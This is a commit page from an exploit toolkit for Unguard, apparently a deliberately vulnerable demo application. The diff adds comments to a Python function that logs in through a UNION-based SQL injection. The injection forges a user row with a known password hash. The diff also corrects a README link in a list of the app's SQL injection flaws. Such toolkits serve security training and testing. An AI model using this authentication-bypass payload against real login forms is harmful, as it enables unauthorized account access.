Skip to content

Commit bf67320

Browse files
matthias-kranzerW3D3
authored andcommitted
✨ feat(exploit-toolkit): Improve docs
1 parent 8eba80a commit bf67320

File tree

2 files changed

+3
-1
lines changed

2 files changed

+3
-1
lines changed

exploit-toolkit/exploit.py

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -408,9 +408,11 @@ def sql_inject_login(target):
408408
"""
409409
session = requests.session()
410410

411+
# create a fake query result from the user table with the ID 1 and the hashed password 'password'
411412
user_injection = "SELECT \"user\", \"$2a$10$MolvAKiEajLTuAN2HtaR/O.6h8wGhl3/UPn4WUCZ4sCAtbngzWgfy\", 1 FROM DUAL"
412413
password = "password"
413414

415+
# using SQL injection to ignore the real user query and use our prepared result instead
414416
sql_injection_username = "\" OR 1 = 0 UNION ALL " + user_injection + " #"
415417

416418
user_data = {'username': sql_injection_username, 'password': password}

exploit-toolkit/exploits/sql-injection/README.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -5,4 +5,4 @@ Unguard has four SQL injection vulnerabilities:
55
* [One in the Golang `status-service`](./SQLI-STATUS-SERVICE-MARIADB.md), which is exploitable through the search bar on the Users page and allows you to access the MariaDB database.
66
* [One in the PHP `like-service`](./SQLI-LIKE-SERVICE-REMOVE-LIKE.md), which allows you to remove another user's like on a given post.
77
* [One in the .NET `membership-service`](./SQLI-MEMBERSHIP-SERVICE-MARIADB.md), which allows you to add or change another user's membership state.
8-
* [One in the Node.js `user-auth-service`](./SQLI-MEMBERSHIP-SERVICE-MARIADB.md), which is exploitable through the search bar on the login page and allows you to access the MariaDB database.
8+
* [One in the Node.js `user-auth-service`](./SQLI-USER-AUTH-SERVICE-MARIADB.md), which is exploitable through the username field on the login page and allows you to access the MariaDB database.

0 commit comments

Comments
 (0)